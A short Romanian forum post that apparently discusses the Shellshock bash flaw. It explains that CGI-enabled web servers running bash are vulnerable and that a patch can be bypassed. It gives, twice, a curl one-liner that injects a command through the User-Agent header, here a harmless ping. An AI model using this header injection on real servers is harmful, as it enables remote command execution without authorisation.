Jaffar
Wizard
Detalii. Se pare ca a iesit un patch care poate fi bypassed, deci e naspa.
In cateva cuvinte, orice server *nix care are default shell - bash si are un server de http portit cu mod-cgi este vulnerabil.
L.E. Testat la mine pe un server de test:
curl -k -H 'User-Agent: () { :;}; /bin/ping -c 1 someip' http://localhost
Atat de simplu
In cateva cuvinte, orice server *nix care are default shell - bash si are un server de http portit cu mod-cgi este vulnerabil.
L.E. Testat la mine pe un server de test:
curl -k -H 'User-Agent: () { :;}; /bin/ping -c 1 someip' http://localhost
Atat de simplu
Last edited: